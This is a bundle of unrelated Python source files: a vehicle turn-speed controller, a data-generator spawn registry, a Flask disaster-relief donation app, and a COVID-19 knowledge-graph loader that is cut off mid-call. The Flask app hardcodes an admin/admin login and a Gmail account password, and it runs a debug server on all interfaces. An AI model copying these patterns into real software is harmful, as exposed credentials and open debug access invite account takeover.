        self._active_accel_limits = [0.0, 0.0]
        self._adapting_jerk_limits = [_MIN_ADAPTING_BRAKE_JERK, 1.0]
        self._v_ego = 0.0
        self._a_ego = 0.0
        self._v_offset = 0.0  # speed_limit - v_ego; negative means we must slow down.
        self._speed_limit = 0.0
        self._distance = 0.0
        self._turn_sign = 0
        self._state = TurnSpeedControlState.inactive
        self._next_speed_limit_prev = 0.  # tracks the ahead-limit already provided.
        self._adapting_cycles = 0
        self._adapting_time = 0.
        self.v_turn_limit = 0.0
        self.a_turn_limit = 0.0
        self.v_turn_limit_future = 0.0
    @property
    def state(self):
        """Current TurnSpeedControlState."""
        return self._state
    @state.setter
    def state(self, value):
        if value != self._state:
            _debug(f'Turn Speed Controller state: {_description_for_state(value)}')
            if value == TurnSpeedControlState.adapting:
                self._adapting_cycles = 0  # Reset adapting state cycle count when entering state.
                # Adapting time must be calculated at the moment we enter adapting state.
                self._adapting_time = self._v_offset / _LIMIT_ADAPT_ACC
        self._state = value
    @property
    def is_active(self):
        # NOTE(review): relies on the enum's numeric ordering placing
        # adapting/active above tempInactive — confirm against the schema.
        return self.state > TurnSpeedControlState.tempInactive
    @property
    def speed_limit(self):
        """Effective speed limit: 0 when none, otherwise clamped to _MIN_SPEED_LIMIT."""
        return max(self._speed_limit, _MIN_SPEED_LIMIT) if self._speed_limit > 0. else 0.
    @property
    def distance(self):
        """Distance to the upcoming turn speed limit (m)."""
        return self._distance
    @property
    def turn_sign(self):
        """Sign/direction indicator of the turn limit from map data."""
        return self._turn_sign
    def _get_limit_from_map_data(self, sm):
        """Provides the speed limit, distance and turn sign to it for turns based on map data.

        :return: tuple (speed_limit, distance, turn_sign); all zeros when no
            valid map data is available.
        """
        # Ignore if no live map data
        sock = 'liveMapData'
        if sm.logMonoTime[sock] is None:
            _debug('TS: No map data for turn speed limit')
            return 0., 0., 0
        # Load limits from map_data
        map_data = sm[sock]
        speed_limit = 0.
        turn_sign = map_data.turnSpeedLimitSign if map_data.turnSpeedLimitValid else 0
        next_speed_limit = map_data.turnSpeedLimitAhead if map_data.turnSpeedLimitAheadValid else 0.
        next_turn_sign = map_data.turnSpeedLimitAheadSign if map_data.turnSpeedLimitAheadValid else 0
        # Calculate the age of the gps fix. Ignore if too old.
        # (lastGpsTimestamp is scaled by 1e-3, i.e. stored in milliseconds.)
        gps_fix_age = time.time() - map_data.lastGpsTimestamp * 1e-3
        if gps_fix_age > _MAX_MAP_DATA_AGE:
            _debug(f'TS: Ignoring map data as is too old. Age: {gps_fix_age}')
            return 0., 0., 0
        # Ensure current speed limit is considered only if we are inside the section.
        if map_data.turnSpeedLimitValid and self._v_ego > 0.:
            speed_limit_end_time = (map_data.turnSpeedLimitEndDistance / self._v_ego) - gps_fix_age
            if speed_limit_end_time > 0.:
                speed_limit = map_data.turnSpeedLimit
        # When we have no ahead speed limit to consider or it is greater than current speed limit
        # or car has stopped, then provide current value and reset tracking.
        if next_speed_limit == 0. or self._v_ego <= 0. or (speed_limit > 0 and next_speed_limit > speed_limit):
            self._next_speed_limit_prev = 0.
            return speed_limit, 0., turn_sign
        # Calculate the distance to the next speed limit ahead corrected by gps_fix_age
        distance_since_fix = self._v_ego * gps_fix_age
        distance_to_limit_ahead = max(0., map_data.turnSpeedLimitAheadDistance - distance_since_fix)
        # When we have a next_speed_limit value that has not changed from a provided next speed limit value
        # in previous resolutions, we keep providing it along with the updated distance to it.
        if next_speed_limit == self._next_speed_limit_prev:
            return next_speed_limit, distance_to_limit_ahead, next_turn_sign
        # Reset tracking
        self._next_speed_limit_prev = 0.
        # Calculate the time needed to adapt to the new limit and the corresponding distance.
        adapt_time = (max(next_speed_limit, _MIN_SPEED_LIMIT) - self._v_ego) / _LIMIT_ADAPT_ACC
        adapt_distance = self._v_ego * adapt_time + 0.5 * _LIMIT_ADAPT_ACC * adapt_time**2
        # When we detect we are close enough, we provide the next limit value and track it.
        if distance_to_limit_ahead <= adapt_distance:
            self._next_speed_limit_prev = next_speed_limit
            return next_speed_limit, distance_to_limit_ahead, next_turn_sign
        # Otherwise we just provide the calculated speed_limit
        return speed_limit, 0., turn_sign
    def _update_params(self):
        """Re-read the enable toggle from Params at most every 5 seconds."""
        # NOTE(review): the local name shadows the imported `time` module
        # inside this method; works, but is fragile.
        time = sec_since_boot()
        if time > self._last_params_update + 5.0:
            self._is_enabled = self._params.get("TurnSpeedControl", encoding='utf8') == "1"
            self._last_params_update = time
    def _update_calculations(self):
        # Update current velocity offset (error)
        self._v_offset = self.speed_limit - self._v_ego
    def _state_transition(self):
        """Advance the inactive/adapting/active state machine."""
        # In any case, if op is disabled, or speed limit control is disabled
        # or the reported speed limit is 0, deactivate.
        if not self._op_enabled or not self._is_enabled or self.speed_limit == 0.:
            self.state = TurnSpeedControlState.inactive
            return
        # inactive
        if self.state == TurnSpeedControlState.inactive:
            # If the limit speed offset is negative (i.e. reduce speed) and lower than threshold
            # we go to adapting state to quickly reduce speed, otherwise we go directly to active
            if self._v_offset < _SPEED_OFFSET_TH:
                self.state = TurnSpeedControlState.adapting
            else:
                self.state = TurnSpeedControlState.active
        # adapting
        elif self.state == TurnSpeedControlState.adapting:
            self._adapting_cycles += 1
            # Go to active once the speed offset is over threshold.
            if self._v_offset >= _SPEED_OFFSET_TH:
                self.state = TurnSpeedControlState.active
        # active
        elif self.state == TurnSpeedControlState.active:
            # Go to adapting if the speed offset goes below threshold.
            if self._v_offset < _SPEED_OFFSET_TH:
                self.state = TurnSpeedControlState.adapting
    def _update_solution(self):
        """Compute v/a targets for the current state."""
        # inactive
        if self.state == TurnSpeedControlState.inactive:
            # Preserve values
            self.v_turn_limit = self._v_ego
            self.a_turn_limit = self._a_ego
            self.v_turn_limit_future = self._v_ego
        # adapting
        elif self.state == TurnSpeedControlState.adapting:
            # Calculate to adapt speed on target time.
            adapting_time = max(self._adapting_time - self._adapting_cycles * _LON_MPC_STEP, 1.0)  # min adapt time 1 sec.
            a_target = (self.speed_limit - self._v_ego) / adapting_time
            # smooth out acceleration using jerk limits.
            j_limits = np.array(self._adapting_jerk_limits)
            a_limits = self._a_ego + j_limits * _LON_MPC_STEP
            a_target = max(min(a_target, a_limits[1]), a_limits[0])
            # calculate the solution values
            self.a_turn_limit = max(a_target, _MIN_ADAPTING_BRAKE_ACC)  # acceleration in next Longitudinal control step.
            self.v_turn_limit = self._v_ego + self.a_turn_limit * _LON_MPC_STEP  # speed in next Longitudinal control step.
            self.v_turn_limit_future = max(self._v_ego + self.a_turn_limit * 4., self.speed_limit)  # speed in 4 seconds.
        # active
        elif self.state == TurnSpeedControlState.active:
            # Calculate following same cruise logic in planner.py
            self.v_turn_limit, self.a_turn_limit = \
                speed_smoother(self._v_ego, self._a_ego, self.speed_limit, self._active_accel_limits[1],
                               self._active_accel_limits[0], self._active_jerk_limits[1], self._active_jerk_limits[0],
                               _LON_MPC_STEP)
            self.v_turn_limit = max(self.v_turn_limit, 0.)
            self.v_turn_limit_future = self.speed_limit
    def update(self, enabled, v_ego, a_ego, sm, accel_limits, jerk_limits):
        """Run one control cycle: ingest inputs, update state and solution."""
        self._op_enabled = enabled
        self._v_ego = v_ego
        self._a_ego = a_ego
        self._active_accel_limits = accel_limits
        self._active_jerk_limits = jerk_limits
        # Get the speed limit from Map Data
        self._speed_limit, self._distance, self._turn_sign = self._get_limit_from_map_data(sm)
        self._update_params()
        self._update_calculations()
        self._state_transition()
        self._update_solution()
    def deactivate(self):
        """Force the controller back to the inactive state."""
        self.state = TurnSpeedControlState.inactive
|
import textwrap
from bidict import bidict
from itertools import count
from .logging import logger
from .primitive_generators import PrimitiveGenerator
from .derived_generators import Apply, GetAttribute, Lookup, SelectOneDerived
__all__ = ['SpawnContext']
class NoExistingSpawn(Exception):
    """
    Raised when no previously spawned generator exists for a given template.
    """
class SpawnContext:
    """Registry that spawns concrete field generators from templates.

    Keeps a bidirectional mapping between names and generator templates so
    that each template is spawned at most once, and tracks which spawns were
    created anonymously (i.e. without a user-supplied name).
    """
    def __init__(self):
        self.templates = bidict()  # mapping {name -> field_generator_template}
        self.spawns = {}  # mapping {name -> field_generator}
        self.anonymous_spawns = []  # names of anonymously spawned generators
        self.cnt_anonymous = count()  # counter used to generate anonymous names
    def __repr__(self):
        return textwrap.dedent(f"""
            <SpawnContextCG:
               templates: {dict(self.templates)}
               spawns: {dict(self.spawns)}
               anonymous: {self.anonymous_spawns}
            >""")
    @property
    def named_spawns(self):
        """Spawned generators that were given an explicit name."""
        return {name: g for (name, g) in self.spawns.items() if name not in self.anonymous_spawns}
    def get_existing_spawn(self, g_tpl):
        """Return the spawn previously created for *g_tpl*.

        :raises NoExistingSpawn: if *g_tpl* has not been spawned before.
        """
        try:
            existing_name = self.templates.inv[g_tpl]
            return self.spawns[existing_name]
        except KeyError:
            logger.debug(f"No existing spawn for {g_tpl}")
            raise NoExistingSpawn()
    def spawn_template(self, g_tpl, *, name):
        """Spawn a concrete generator for template *g_tpl*, reusing any
        existing spawn; recursively spawns parent/argument templates.

        :param g_tpl: the field generator template to spawn.
        :param name: name to register the spawn under, or None for an
            anonymous spawn.
        :return: the spawned field generator.
        :raises NotImplementedError: for unsupported template types.
        """
        if name is None:
            try:
                name = self.templates.inv[g_tpl]
            except KeyError:
                # Sentinel prefix marks anonymous spawns; must stay in sync
                # with the startswith() check below.
                name = f'ANONYMOUS_ANONYMOUS_ANONYMOUS_{next(self.cnt_anonymous)}'
                self.anonymous_spawns.append(name)
                logger.debug(f"Found anonymous field generator template: {g_tpl}")
        try:
            self.spawns[name] = self.get_existing_spawn(g_tpl)
        except NoExistingSpawn:
            # Each supported template type spawns its parents first, then
            # rebuilds an equivalent generator wired to the new parents.
            if isinstance(g_tpl, PrimitiveGenerator):
                self.templates[name] = g_tpl
                self.spawns[name] = g_tpl.spawn()
            elif isinstance(g_tpl, SelectOneDerived):
                new_parent = self.spawn_template(g_tpl.parent, name=None)
                self.templates[name] = g_tpl
                self.spawns[name] = SelectOneDerived(new_parent)
            elif isinstance(g_tpl, GetAttribute):
                new_parent = self.spawn_template(g_tpl.parent, name=None)
                self.templates[name] = g_tpl
                self.spawns[name] = GetAttribute(new_parent, name=g_tpl.name)
            elif isinstance(g_tpl, Lookup):
                new_parent = self.spawn_template(g_tpl.parent, name=None)
                self.templates[name] = g_tpl
                self.spawns[name] = Lookup(new_parent, mapping=g_tpl.mapping)
            elif isinstance(g_tpl, Apply):
                new_arg_gens = []
                for gen in g_tpl.func_arg_gens_orig.arg_gens:
                    new_arg_gens.append(self.spawn_template(gen, name=None))
                new_kwarg_gens = {}
                for gen_name, gen in g_tpl.func_arg_gens_orig.kwarg_gens.items():
                    new_kwarg_gens[gen_name] = self.spawn_template(gen, name=None)
                self.templates[name] = g_tpl
                self.spawns[name] = Apply(g_tpl.func, *new_arg_gens, **new_kwarg_gens)
            else:
                raise NotImplementedError(f'g_tpl: {g_tpl}')
        # Set tohu_name for nicer debugging
        if name.startswith('ANONYMOUS_ANONYMOUS_ANONYMOUS_'):
            self.spawns[name].set_tohu_name(f'anonymous_{g_tpl.tohu_id}')
        else:
            self.spawns[name].set_tohu_name(name)
        return self.spawns[name]
|
from flask import Flask, flash, redirect, render_template, request, session, abort,url_for
import os,jsonlines
import matplotlib.pyplot as plt
import io,smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
# import encoders
import subprocess
import graph
import base64,json
import datetime,time
from passlib.hash import sha256_crypt
import warnings
warnings.filterwarnings(action="ignore")
import pandas as pd
from sklearn.model_selection import train_test_split #uses only some part of data & is time saving
from sklearn.linear_model import LogisticRegression
import nlpCode
app = Flask(__name__)  # Flask application instance shared by all routes below.
@app.route('/donation',methods=["POST","GET"])
def donationFunction():
    """Record a donation as a new block in the donation chain.

    On POST: drops the CVV (never persisted), timestamps the form data,
    links it to the hash of the last block in static/donation.jsonl,
    appends the new block, then triggers the allocation algorithm.
    """
    if request.method == "POST":
        block = request.form.to_dict()
        block.pop('cvv')  # never persist the card CVV
        print(block)
        block["timestamp"] = time.time()
        # Walk the existing chain to find the hash of the most recent block.
        prev_hash = "0"
        with jsonlines.open('static/donation.jsonl') as reader:
            for obj in reader:
                if obj:
                    print(obj["block_hash"])
                    prev_hash = obj["block_hash"]
        block["prev_hash"] = prev_hash
        block["block_hash"] = blockhash(block, prev_hash)
        with jsonlines.open('static/donation.jsonl', mode='a') as writer:
            writer.write(block)
        item = {"food": 1, "clothes": 2, "water": 3, "med": 4}
        # SECURITY FIX: pass arguments as a list with shell=False so that
        # attacker-controlled form fields cannot inject shell commands.
        subprocess.call(['python3', 'algo.py', str(block["amount"]),
                         str(item[block["item"]]), block["aadhar"]])
    return render_template('donation.html')
@app.route('/viewDonation')
def viewDonationFunction():
    """Render the page listing every recorded donation block."""
    with jsonlines.open('static/donation.jsonl') as reader:
        print(reader)
        donations = [record for record in reader]
    return render_template('viewDonation.html', donations=donations)
@app.route('/viewExpenditure')
def viewExpenditureFunction():
    """Render the page listing every recorded expenditure block."""
    with jsonlines.open('static/expenditure.jsonl') as reader:
        print(reader)
        expenditures = [record for record in reader]
    return render_template('viewExpenditure.html', expenditures=expenditures)
@app.route('/viewStatus')
def viewStatus():
    """Render the page listing the recorded citizen status entries."""
    with jsonlines.open('static/citizen.jsonl') as reader:
        print(reader)
        statuses = [record for record in reader]
    return render_template('viewStatus.html', statuses=statuses)
@app.route('/displayDetails', methods=["POST", "GET"])
def displayDetails():
    """Render the page listing the recorded government detail entries."""
    with jsonlines.open('static/govt.jsonl') as reader:
        print(reader)
        details = [record for record in reader]
    return render_template('displayDetails.html', details=details)
@app.route('/viewDisasters', methods=["POST", "GET"])
def viewDisasters():
    """Render the page listing every recorded disaster event."""
    with jsonlines.open('static/disaster.jsonl') as reader:
        print(reader)
        disasters = [record for record in reader]
    return render_template('viewDisaster.html', disasters=disasters)
@app.route('/citizen_rescue', methods=["POST", "GET"])
def citizen_rescue():
    """Mark a citizen (looked up by aadhar) as safe/unsafe and notify them.

    NOTE(review): the updated record is appended (mode='a'), so the file
    accumulates multiple records per citizen — this matches the app's
    append-only chain style; readers see the latest entry last.
    """
    if request.method == "POST":
        result = request.form["aadhar"]
        with jsonlines.open('static/citizen.jsonl', mode='r') as reader:
            for obj in reader:
                if obj["aadhar"] == result:
                    obj["statusLiving"] = "True" if request.form["status"] == "yes" else "False"
                    sendmail(obj["email"], "Person has been marked Safe",
                             "This message of the disaster relief management system please do not reply to this mail.",
                             "", "")
                    # Context manager guarantees the file handle is closed.
                    with jsonlines.open('static/citizen.jsonl', mode='a') as writer:
                        writer.write(obj)
                    break
    return render_template('citizen_rescue.html')
@app.route('/login', methods=["POST", "GET"])
def login():
    """Admin login page; sets session['user'] on success."""
    if request.method == "POST":
        # SECURITY: hardcoded admin/admin credentials — replace with a real
        # user store and hashed passwords before production use.
        if request.form["username"] == 'admin' and request.form["password"] == "admin":
            session['user'] = 'admin'
            return redirect(url_for('govtView'))
        # Failed login: re-render with the error message (the previous
        # version assigned an unused local here).
        return render_template('login.html', message="Wrong Creds")
    return render_template('login.html')
@app.route('/logout', methods=["POST", "GET"])
def logout():
    """Clear the admin session (if any) and return to the login page."""
    session.pop('user',None)
    return redirect(url_for('login'))
@app.route('/govtView',methods=["POST","GET"])
def govtView():
    """Government dashboard; requires an authenticated admin session."""
    # BUGFIX: session.get avoids a KeyError when nobody has logged in yet
    # (session['user'] raised on anonymous visits).
    if session.get('user') == 'admin':
        if request.method == "POST":
            # NOTE(review): `nlpCode` is an imported *module*, so calling it
            # directly raises TypeError — presumably a function inside the
            # module was intended; confirm its API before relying on this.
            dic = nlpCode(request.form["disaster"])
            return render_template('display.html', dic=dic)
        return render_template('govtView.html')
    else:
        message = "Wrong credentials"
        return render_template('login.html', message=message)
@app.route('/assignFunds', methods=["POST", "GET"])
def assignFunds():
    """Predict required relief funds from death toll and magnitude, then
    render the fund-assignment page with the known disasters.

    On POST, fits a LogisticRegression on data.csv and plots the prediction
    via graph.py.
    """
    if request.method == "POST":
        deathtoll = request.form["death_toll"]
        mag = request.form["mag"]
        filename = 'data.csv'
        hnames = ['deathtoll', 'mag', 'req_fund']
        dataframe = pd.read_csv(filename, names=hnames)
        array = dataframe.values
        dataframe.plot(x='deathtoll', y='req_fund', kind='line')
        # separate array into input and output components
        x = array[:, 0:2]  # input columns: deathtoll, mag
        y = array[:, 2]  # output column: req_fund
        test_data_size = 0.1  # hold out 10% of data for testing
        x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=test_data_size)
        model = LogisticRegression()
        model.fit(x_train, y_train)
        r = model.predict([[int(deathtoll), float(mag)]])
        print("enter")
        if deathtoll and r:
            # SECURITY FIX: list-form call (shell=False) prevents form input
            # from being interpreted by the shell.
            subprocess.call(['python3', 'graph.py', str(deathtoll), str(r)])
    disasters = []
    with jsonlines.open('static/disaster.jsonl') as reader:
        print(reader)
        for obj in reader:
            disasters.append(obj)
    return render_template('assignFunds.html', disasters=disasters)
@app.route('/updateEvent', methods=["POST", "GET"])
def updateEvent():
    """List disaster events and, on POST, append a new event block."""
    # Snapshot the existing chain first; a newly posted event therefore only
    # appears on the next request (matches the original read-before-write order).
    with jsonlines.open('static/disaster.jsonl') as reader:
        print(reader)
        disasters = [record for record in reader]
    if request.method == "POST":
        block = request.form.to_dict()
        print(block)
        # Find the hash of the last block so the new record chains onto it.
        prev_hash = "0"
        with jsonlines.open('static/disaster.jsonl') as reader:
            for record in reader:
                if record:
                    print(record["block_hash"])
                    prev_hash = record["block_hash"]
        block["prev_hash"] = prev_hash
        block["block_hash"] = blockhash(block, prev_hash)
        with jsonlines.open('static/disaster.jsonl', mode='a') as writer:
            writer.write(block)
    return render_template('updateEvent.html', disasters=disasters)
@app.route('/expenditure', methods=["POST", "GET"])
def expenditure():
    """Record a new expenditure block (POST) and render the expenditure page."""
    expenditures = []
    if request.method == "POST":
        block = request.form.to_dict()
        print(block)
        # Find the hash of the last block so the new record chains onto it.
        prev_hash = "0"
        with jsonlines.open('static/expenditure.jsonl') as reader:
            for obj in reader:
                if obj:
                    print((obj)["block_hash"])
                    prev_hash = (obj)["block_hash"]
        block["prev_hash"] = prev_hash
        block_hash = blockhash(block, prev_hash)
        block["block_hash"] = block_hash
        with jsonlines.open('static/expenditure.jsonl', mode='a') as writer:
            writer.write(block)
        # Re-read the chain so the response includes the block just added.
        with jsonlines.open('static/expenditure.jsonl') as reader:
            print(reader)
            for obj in reader:
                expenditures.append(obj)
        return render_template('expenditure.html', expenditures=expenditures)
    # NOTE(review): on GET this renders with an empty list — confirm whether
    # the re-read above was meant to run for GET requests too.
    return render_template('expenditure.html', expenditures=expenditures)
@app.route('/', methods=["POST", "GET"])
@app.route('/userView', methods=["POST", "GET"])
def userView():
    """Landing page (also served at the site root)."""
    return render_template('userView.html')
def blockhash(values,prev_hash=""):
concat=""
for x in values:
concat+=str(x)
concat+=prev_hash
print(concat)
return(sha256_crypt.hash(concat))
def predict_and_plot():
    """Render the government dashboard template.

    NOTE(review): no @app.route decorator and no callers visible in this
    file — appears to be dead code; confirm before removing.
    """
    return render_template('govtView.html')
def sendmail(to, mail_subject, mail_body, mail_attach, filename=""):
    """Send an email via Gmail SMTP, optionally with one attachment.

    :param to: recipient email address
    :param mail_subject: subject line
    :param mail_body: plain-text body
    :param mail_attach: an open file-like object to attach, or a falsy value
        (e.g. "") for no attachment
    :param filename: filename to present for the attachment
    """
    # BUGFIX: `encoders` was never imported (the top-of-file import is
    # commented out), so any call with an attachment raised NameError.
    from email import encoders

    fromaddr = "portalnie@gmail.com"
    toaddr = to
    msg = MIMEMultipart()
    msg['From'] = fromaddr
    msg['To'] = toaddr
    msg['Subject'] = mail_subject
    body = mail_body
    attachment = mail_attach
    # Renamed from the inverted `noattach` (it was 1 when an attachment
    # WAS present).
    has_attachment = 1 if attachment else 0
    if attachment:
        msg.attach(MIMEText(body, 'plain'))
        # Encode the payload as a base64 octet-stream part.
        p = MIMEBase('application', 'octet-stream')
        p.set_payload(attachment.read())
        encoders.encode_base64(p)
        p.add_header('Content-Disposition', "attachment; filename= %s" % filename)
        msg.attach(p)
    s = smtplib.SMTP('smtp.gmail.com', 587)
    s.starttls()
    # SECURITY: credentials hardcoded in source — move to config/env vars.
    s.login(fromaddr, "portalniewelcome")
    # With an attachment send the full MIME message; otherwise a minimal
    # plain-text message carrying only a Subject header and the body.
    text = msg.as_string() if has_attachment else 'Subject: {}\n\n{}'.format(mail_subject, mail_body)
    s.sendmail(fromaddr, toaddr, text)
    s.quit()
def build_graph(sections, colors, personname):
    """Build a pie chart of a person's donation distribution and return it
    as a base64-encoded ``data:`` URI suitable for an <img> src attribute.

    :param sections: four wedge sizes, ordered Food, Water, Shelter, Medicine
    :param colors: matplotlib color codes, one per wedge
    :param personname: donor name used in the chart title
    """
    img = io.BytesIO()
    labels='Food','Water','Shelter','Medicine' #anticlockwise nomenclature
    plt.pie(sections,labels=labels,colors=colors,startangle=90,explode=(0,0,0,0),autopct='%1.2f%%')
    # %1 specifies the space between the %sign and the number & %% at the end print the %sign
    plt.title(personname+' donation distribution',loc="right")
    plt.savefig(img, format='png')
    img.seek(0)
    graph_url = base64.b64encode(img.getvalue()).decode()
    plt.close()  # release the figure so charts don't bleed into each other
    return 'data:image/png;base64,{}'.format(graph_url)
def build_graph_pre(ra1, r):
    """Plot the deathtoll/required-fund curve from data.csv with the point
    (ra1, r) marked, and return it as a base64 ``data:`` URI.

    :param ra1: x value (death toll) to highlight
    :param r: y value (predicted required fund) to highlight
    """
    filename= 'data.csv'
    hnames= ['deathtoll','mag','req_fund']
    dataframe=pd.read_csv(filename,names=hnames)
    array= dataframe.values
    # NOTE(review): dataframe.plot draws onto the current figure; the marker
    # below is then added to the same axes before saving — confirm intended.
    dataframe.plot(x ='deathtoll', y='req_fund', kind = 'line')
    img = io.BytesIO()
    plt.plot(ra1, r,marker='o',markerfacecolor='red',markersize=7,
             linestyle='dashed',color='blue')
    plt.savefig(img, format='png')
    img.seek(0)
    graph_url = base64.b64encode(img.getvalue()).decode()
    plt.close()
    return 'data:image/png;base64,{}'.format(graph_url)
@app.route('/graphs')
def graphs():
    """Render the donation dashboard with one pie chart per donor."""
    # These coordinates could be stored in DB
    palette = ['c', 'g', 'y', 'b']
    donors = [
        ("Ram Prasad", [20, 30, 20, 50]),
        ("Sai Ayachit", [80, 10, 40, 50]),
        ("Shithij Rai", [5, 15, 14, 20]),
    ]
    charts = [build_graph(sections, palette, name) for name, sections in donors]
    return render_template('graphs.html',
                           graph1=charts[0],
                           graph2=charts[1],
                           graph3=charts[2])
if __name__ == "__main__":
    # random per-process secret key: Flask sessions won't survive a restart
    app.secret_key = os.urandom(12)
    # listens on all interfaces; debug=True is unsafe for production deployments
    app.run(debug=True,host='0.0.0.0', port=5555)
|
import os
import logging
import enum
from copy import deepcopy
from Common.utils import LoggingUtil, GetData
from Common.loader_interface import SourceDataLoader
from Common.extractor import Extractor
from Common.node_types import AGGREGATOR_KNOWLEDGE_SOURCES, ORIGINAL_KNOWLEDGE_SOURCE
# the data header columns for both nodes files are:
class NODESDATACOLS(enum.IntEnum):
    """Column indices shared by both (SciBite and SciGraph) nodes files."""
    ID = 0
    CATEGORY = 1
    NAME = 2
# the data header columns for the SciBites edges file are:
class SBEDGESDATACOLS(enum.IntEnum):
    """Column indices for the SciBite edges file (tab delimited)."""
    SUBJECT = 0
    OBJECT = 1
    ENRICHMENT = 5
    EFFECTIVE_PUBS = 6
# the data header columns for the SciGraph edges file are:
class SGEDGESDATACOLS(enum.IntEnum):
    """Column indices for the SciGraph edges file (tab delimited)."""
    SUBJECT = 0
    OBJECT = 1
    ENRICHMENT = 2
    EFFECTIVE_PUBS = 3
# the data header columns for covid phenotypes are:
class PHENOTYPESDATACOLS(enum.IntEnum):
    """Column indices for the covid phenotypes CSV file."""
    PHENOTYPE_NAME = 0
    PHENOTYPE_ID = 1
    PHENOTYPE_HP_NAME = 2
    PHENOTYPE_NOTE = 3
# the data header columns for drug trials:
class TRIALSDATACOLS(enum.IntEnum):
    """Column indices for the DrugBank drug-trials file (tab delimited)."""
    DRUG_ID = 0
    PREDICATE = 1
    TARGET_ID = 2
    COUNT = 3
##############
# Class: cord19 data source loader
#
# Desc: Class that loads/parses the cord19 model data.
##############
class Cord19Loader(SourceDataLoader):
    """Loads/parses the cord19 model data.

    Edges come from two co-occurrence analyses (SciBite and SciGraph), plus a
    curated COVID-19 phenotype list and DrugBank drug-trial records. After
    extraction, every edge attached to the COVID-19 disease node is mirrored
    onto the SARS-CoV-2 taxon node and vice versa (see _mirror_covid_edges).
    """

    source_id: str = 'Cord19'
    provenance_id: str = 'infores:cord19'

    def __init__(self, test_mode: bool = False):
        """
        constructor
        :param test_mode: sets the run into test mode
        """
        # call the super
        # NOTE(review): super(SourceDataLoader, self) starts the MRO lookup *after*
        # SourceDataLoader, so SourceDataLoader.__init__ itself is skipped here.
        # Left unchanged in case that is deliberate — confirm before changing.
        super(SourceDataLoader, self).__init__()

        # NOTE 1: The nodes files are not necessary, unless we decide we want the names from them.
        # Leaving them set up here just in case we do in the future..
        self.scibite_url = 'https://stars.renci.org/var/data_services/cord19/scibite/v6/'
        self.scibite_edges_file_name = 'CV19_edges.txt'
        # self.scibite_nodes_file_name = 'CV19_nodes.txt'

        # (attribute name contains a typo — "scrigraph" — kept for compatibility)
        self.scrigraph_url = 'https://stars.renci.org/var/data_services/cord19/scigraph/v12/'
        self.scigraph_edges_file_name = 'pairs.txt'
        # self.scigraph_nodes_file_name = 'normalized.txt'

        # both co-occurrence sources produce "correlated with" edges
        self.related_to_predicate = 'biolink:correlated_with'
        self.covid_node_id = 'MONDO:0100096'
        self.has_phenotype_predicate = 'RO:0002200'
        self.covid_phenotypes_url = 'https://stars.renci.org/var/data_services/cord19/'
        self.covid_phenotypes_file_name = 'covid_phenotypes.csv'
        self.drug_bank_trials_url = 'https://raw.githubusercontent.com/TranslatorIIPrototypes/CovidDrugBank/master/'
        self.drug_bank_trials_file_name = 'trials.txt'

        # local working directory for downloaded source files
        self.data_path: str = os.path.join(os.environ['DATA_SERVICES_STORAGE'], self.source_id, 'source')
        if not os.path.exists(self.data_path):
            # makedirs (not mkdir) so a missing parent directory is not fatal
            os.makedirs(self.data_path, exist_ok=True)

        self.data_files: list = [self.scibite_edges_file_name,
                                 # self.scibite_nodes_file_name,
                                 self.scigraph_edges_file_name,
                                 # self.scigraph_nodes_file_name,
                                 self.covid_phenotypes_file_name,
                                 self.drug_bank_trials_file_name]

        self.test_mode: bool = test_mode

        # the final output lists of nodes and edges
        self.final_node_list: list = []
        self.final_edge_list: list = []

        # create a logger
        self.logger = LoggingUtil.init_logging("Data_services.cord19.Cord19Loader", level=logging.INFO, line_format='medium', log_file_path=os.environ['DATA_SERVICES_LOGS'])

    def get_latest_source_version(self) -> str:
        """
        gets the version of the data
        :return: fixed version string combining the two source versions
        """
        return 'scibite_v6_scigraph_v12'

    def get_data(self) -> bool:
        """
        Gets the cord19 data, pulling each source file via http into data_path.
        :return: True when all pulls completed
        """
        sources_to_pull = [
            f'{self.covid_phenotypes_url}{self.covid_phenotypes_file_name}',
            # f'{self.scibite_url}{self.scibite_nodes_file_name}',
            f'{self.scibite_url}{self.scibite_edges_file_name}',
            # f'{self.scrigraph_url}{self.scigraph_nodes_file_name}',
            f'{self.scrigraph_url}{self.scigraph_edges_file_name}',
            f'{self.drug_bank_trials_url}{self.drug_bank_trials_file_name}'
        ]
        data_puller = GetData()
        for source_url in sources_to_pull:
            data_puller.pull_via_http(source_url, self.data_path)
        return True

    def parse_data(self) -> dict:
        """
        Parses the data files for graph nodes/edges.
        :return: ret_val: load_metadata from the extractor
        """
        extractor = Extractor()

        """
        # See NOTE 1 above about nodes files
        #
        # parse the scibites nodes files
        for nodes_file_name in [self.scibite_nodes_file_name, self.scigraph_nodes_file_name]:
            nodes_file: str = os.path.join(self.data_path, nodes_file_name)
            with open(nodes_file, 'r') as fp:
                extractor.csv_extract(fp,
                                      lambda line: line[NODESDATACOLS.ID.value],  # extract subject id
                                      lambda line: None,  # extract object id
                                      lambda line: None,  # predicate extractor
                                      lambda line: {'name': line[NODESDATACOLS.NAME.value]},  # subject props
                                      lambda line: {},  # object props
                                      lambda line: {},  # edge props
                                      comment_character=None,
                                      delim='\t',
                                      has_header_row=True)
        """

        # parse the scibites edges file (ids have stray underscores to strip)
        edges_file: str = os.path.join(self.data_path, self.scibite_edges_file_name)
        with open(edges_file, 'r') as fp:
            extractor.csv_extract(fp,
                                  lambda line: line[SBEDGESDATACOLS.SUBJECT.value].replace('_', ''),  # subject id
                                  lambda line: line[SBEDGESDATACOLS.OBJECT.value].replace('_', ''),  # object id
                                  lambda line: self.related_to_predicate,  # predicate extractor
                                  lambda line: {},  # subject props
                                  lambda line: {},  # object props
                                  lambda line: {'num_publications': float(line[SBEDGESDATACOLS.EFFECTIVE_PUBS.value]),
                                                'enrichment_p': float(line[SBEDGESDATACOLS.ENRICHMENT.value]),
                                                ORIGINAL_KNOWLEDGE_SOURCE: 'infores:cord19-scibite'},  # edge props
                                  comment_character=None,
                                  delim='\t',
                                  has_header_row=True)

        # parse the scigraph edges file
        edges_file: str = os.path.join(self.data_path, self.scigraph_edges_file_name)
        with open(edges_file, 'r') as fp:
            extractor.csv_extract(fp,
                                  lambda line: line[SGEDGESDATACOLS.SUBJECT.value],  # subject id
                                  lambda line: line[SGEDGESDATACOLS.OBJECT.value],  # object id
                                  lambda line: self.related_to_predicate,  # predicate extractor
                                  lambda line: {},  # subject props
                                  lambda line: {},  # object props
                                  lambda line: {'num_publications': float(line[SGEDGESDATACOLS.EFFECTIVE_PUBS.value]),
